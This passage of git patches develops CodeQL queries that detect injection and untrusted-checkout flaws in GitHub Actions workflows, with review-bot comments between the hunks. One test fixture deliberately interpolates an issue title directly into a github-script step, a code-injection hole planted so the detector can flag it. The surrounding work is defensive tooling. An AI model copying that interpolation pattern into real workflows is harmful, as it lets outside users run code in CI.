[value] | 
@@ -369,6 +374,8 @@ subpaths | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 19b72ad6b5c0..f835d492f686 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -70,6 +70,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | 
@@ -264,6 +265,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 69db192378e35b8ec91bbdcf7c04229129460134 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:40:48 +0200 Subject: [PATCH 375/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../query-tests/Security/CWE-094/.github/workflows/test9.yml | 4 ++++ .../Security/CWE-094/CodeInjectionCritical.expected | 2 +- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + 5 files changed, 8 insertions(+), 3 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 320ef23e413a..34000094dd85 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.11 +version: 0.1.12 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e7a98574a89f..5ccbc7b96578 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.11 +version: 0.1.12 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 47e032fd7278..2d60b9fe6d46 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -37,3 +37,7 @@ jobs: with: script: | core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 7f99d7c9b835..16119dd6453b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,4 +1,3 @@ -WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | 
@@ -269,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f835d492f686..d0834f0dff82 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -268,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7d58beba677157cac60f19b05981da0e1f522d74 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:04:59 +0200 Subject: [PATCH 376/707] Better control check support --- ql/lib/codeql/actions/Ast.qll | 10 ++- ql/lib/codeql/actions/Helper.qll | 34 ++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 77 +++++++++++++++++-- .../actions/security/PoisonableSteps.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 32 ++++++++ .../CWE-077/EnvPathInjectionCritical.ql | 8 +- .../CWE-077/EnvPathInjectionMedium.ql | 12 +-- .../CWE-077/EnvVarInjectionCritical.ql | 20 ++--- .../Security/CWE-077/EnvVarInjectionMedium.ql | 18 ++--- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-078/CommandInjectionMedium.ql | 5 +- .../Security/CWE-094/CodeInjectionCritical.ql | 7 +- .../Security/CWE-094/CodeInjectionMedium.ql | 6 +- ql/src/Security/CWE-349/CachePoisoning.ql | 5 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 13 ++-- .../UntrustedCheckoutTOCTOUCritical.ql | 33 ++------ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 35 ++------- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningMedium.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 7 +- .../CWE-367/.github/workflows/comment.yml | 37 +++++++-- .../UntrustedCheckoutTOCTOUCritical.expected | 18 ++--- .../CWE-829/.github/workflows/test5.yml | 68 ++++++++++++++++ .../CWE-829/.github/workflows/test6.yml | 45 +++++++++++ .../UntrustedCheckoutCritical.expected | 13 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 29 files changed, 391 insertions(+), 181 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5e7c6d77c3e6..0662f100fe42 100644 
--- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -287,13 +287,21 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpressionImpl { + string getAccessPath() { result = super.getAccessPath() } + + string getInnerExpression() { result = super.getInnerExpression() } +} + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } -class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { + string getNeededJobId() { result = super.getNeededJobId() } +} class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 72dc7bf16878..3c7091d2a85d 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,5 +1,6 @@ private import codeql.actions.Ast private import codeql.Locations +private import codeql.actions.security.ControlChecks bindingset[expr] string normalizeExpr(string expr) { 
@@ -215,6 +216,20 @@ predicate inPrivilegedCompositeAction(AstNode node) { ) } +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() and + not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e)) + ) +} + +predicate inPrivilegedContext(AstNode node) { + inPrivilegedCompositeAction(node) + or + inPrivilegedExternallyTriggerableJob(node) +} + predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and @@ -222,13 +237,6 @@ predicate inNonPrivilegedCompositeAction(AstNode node) { ) } -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - predicate inNonPrivilegedJob(AstNode node) { exists(Job j | j = node.getEnclosingJob() and @@ -236,6 +244,12 @@ predicate inNonPrivilegedJob(AstNode node) { ) } +predicate inNonPrivilegedContext(AstNode node) { + inNonPrivilegedCompositeAction(node) + or + inNonPrivilegedJob(node) +} + bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -244,5 +258,9 @@ predicate outputsPartialFileContent(string snippet) { // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH snippet - .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) + .regexpMatch([ + "(\\$\\(|`)<.*", + ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + + ".*" + ]) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7c7c6216b1b7..bb31e198cc62 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
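Review bot: `inPrivilegedExternallyTriggerableJob` now treats a node as unprivileged as soon as any one trigger event of its job is protected, but a job that runs on both `pull_request_target` and `issue_comment` remains reachable through the comment event, which no check can protect because every `getAProtectedEvent` in ControlChecks.qll lists only the two pull-request events. Requiring coverage of every externally triggerable event expresses the intent: replace the `not exists(...)` with `forall(Event e | e = j.getATriggerEvent() and e.isExternallyTriggerable() | exists(ControlCheck check | check.protects(node, e)))`. Separately, `protects` is declared on `Step` (L6061) while the query call sites pass an expression — `sink.getNode().asExpr()` in the EnvPathInjection, EnvVarInjection, CommandInjection, CodeInjection and ArtifactPoisoning queries, and `source.getNode().asExpr()` in CachePoisoningByCodeInjection — so for those sinks the exclusion can only fire if the expression is itself a Step, which I assume it never is. Mapping the expression to the step that contains it before calling `protects` looks like what those queries need.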
@@ -1230,6 +1230,18 @@ string getAJsonReferenceExpression(string s, int offset) { 2) } +bindingset[s] +string getAJsonReferenceAccessPath(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*)", + 3) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability @@ -1245,6 +1257,20 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { abstract AstNodeImpl getTarget(); } +class JsonReferenceExpressionImpl extends ExpressionImpl { + string innerExpression; + string accessPath; + + JsonReferenceExpressionImpl() { + innerExpression = getAJsonReferenceExpression(expression, _) and + accessPath = getAJsonReferenceAccessPath(expression, _) + } + + string getInnerExpression() { result = innerExpression } + + string getAccessPath() { result = accessPath } +} + private string stepsCtxRegex() { result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } @@ -1359,6 +1385,8 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { ) } + string getNeededJobId() { result = neededJob.getId() } + override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 28bc938f8c8e..ec7e0ad05984 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
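Review bot: In `JsonReferenceExpressionImpl`'s characteristic predicate the two `_` offsets are quantified independently, so an expression holding two `fromJson(...)`/`toJson(...)` occurrences pairs each inner expression with each access path, including the mismatched combinations. Binding a single offset for both lookups keeps the pair coherent, assuming both helpers report the same `regexpFind` offset: `exists(int offset | innerExpression = getAJsonReferenceExpression(expression, offset) and accessPath = getAJsonReferenceAccessPath(expression, offset))`. The comment above `getAJsonReferenceAccessPath` still talks about `${{...}}` matches; it should describe this helper, e.g. `// Find every (from|to)Json(...) occurrence and return the member path that follows it`.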
@@ -8,6 +8,12 @@ abstract class ControlCheck extends AstNode { this instanceof UsesStep } + predicate protects(Step step, Event event) { + event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + this.getAProtectedEvent() = event.getName() and + this.dominates(step) + } + predicate dominates(Step step) { this instanceof If and ( 
@@ -26,22 +32,83 @@ abstract class ControlCheck extends AstNode { or this.(UsesStep).getAFollowingStep() = step } + + abstract string getAProtectedEvent(); + + abstract boolean protectsAgainstRefMutationAttacks(); +} + +abstract class AssociationCheck extends ControlCheck { + // checks who you are (identity) + // association checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } +} + +abstract class ActorCheck extends ControlCheck { + // checks who you are (identity) + // actor checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } } -abstract class AssociationCheck extends ControlCheck { } +abstract class RepositoryCheck extends ControlCheck { + // repository checks are effective against pull requests since they can control where the code is coming from + // they are not effective against issue_comment since the repository will always be the same + // who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class ActorCheck extends ControlCheck { } + override boolean 
protectsAgainstRefMutationAttacks() { result = true } +} -abstract class RepositoryCheck extends ControlCheck { } +abstract class PermissionCheck extends ControlCheck { + // permission checks are effective against pull requests since they can control who can make changes + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + // who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class LabelCheck extends ControlCheck { } + override boolean protectsAgainstRefMutationAttacks() { result = true } +} -abstract class PermissionCheck extends ControlCheck { } + +abstract class LabelCheck extends ControlCheck { + // does it protect injection attacks but not pwn requests? + // pwn requests are susceptible to checkout of mutable code + // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things + // they do actually protext against untrusted code execution (sha) + // what you have (approval) + // TODO: A check should be a combination of: + // - event type (pull_request, issue_comment, etc) + // - category (untrusted mutable code, untrusted immutable code, code injection, etc) + // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects + // - we can decide if a control check is effective based only on the ast node + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } +} class EnvironmentCheck extends ControlCheck instanceof Environment { + // Environment checks are not effective against any mutable attacks + // they do actually protext against 
untrusted code execution (sha) + // what you have (approval) EnvironmentCheck() { any() } + + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } } +/* Specific implementations of control checks */ + class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index c228965736da..dc0f3876f86f 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,8 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) ) } @@ -42,7 +43,7 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { EnvVarInjectionFromFileReadRunStep() { - exists(string content, string value| + exists(string content, string value | writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and outputsPartialFileContent(value) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fcccc5d8a14a..8187bca9f049 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
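Review bot: The rationale comments on `AssociationCheck`, `ActorCheck`, `RepositoryCheck` and `PermissionCheck` are near-verbatim copies carrying the same typos (`protext`, `may no detect`), and `RepositoryCheck` is labelled `who you are (identity)` although its own first line says it checks where the code comes from. Every subclass also returns the same `["pull_request", "pull_request_target"]` from `getAProtectedEvent`, so a single explanatory comment plus a non-abstract default on `ControlCheck.getAProtectedEvent()` would leave each subclass documenting only what differs, namely `protectsAgainstRefMutationAttacks`. The `LabelCheck` block is an open design question written as a TODO; for readers of query results a statement of the decision taken is more useful, e.g. `// Label and environment gates are treated as protecting pull-request events, but not against a ref that is mutated after approval`.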
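Review bot: The new boundary set in `LocalScriptExecutionRunStep` accepts `^`, `;`, `$(`, backtick and `|` before the command but not `&&`, so a constructed line such as `chmod +x ./run.sh && ./run.sh` no longer matches a data-model pattern that the old `\\s+` boundary would have reached after the `&&`; I cannot see `poisonableLocalScriptsDataModel`, so whether such a pattern exists is an assumption. Adding `&&` to both groups closes the gap: `cmd = line.regexpCapture(".*(^|;|&&|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|&&|\\||\\)|`|$).*", group)`. The commented-out previous regex on the line above is dead code and should be removed rather than kept beside the new one.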
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -116,6 +116,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "branch", "ref"] + "%") or + e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "branch", "ref"] + "%") or + e.getInnerExpression().matches("%." + ["head", "branch", "ref"] + "%") + ) + ) ) } } @@ -150,6 +166,22 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "sha", "commit"] + "%") or + e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "sha", "commit"] + "%") or + e.getInnerExpression().matches("%." + ["head", "sha", "commit"] + "%") + ) + ) ) } } diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index fc96c3d43538..4ff86eb0fbde 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
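Review bot: The new `JsonReferenceExpression` branches in `ActionsMutableRefCheckout` and `ActionsSHACheckout` both accept `"%.head%"`, so an access path such as `.head.sha` makes one checkout step both a mutable-ref and a SHA checkout, mirroring the overlap already present in the `StepsExpression` branches. If the two classes are meant to be disjoint, which I cannot confirm from this hunk, the mutable-ref branch could exclude paths that name an immutable ref: `not e.getAccessPath().matches("%." + ["sha", "commit"] + "%")`. Either way, a one-line comment stating whether `head` is intentionally ambiguous between the PR head ref and the head SHA would save the next reader the same question.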
@@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and - ( source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink - or - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index cc067598c893..7ca8f4a28382 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvPathInjectionFromFileReadSink - ) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", 
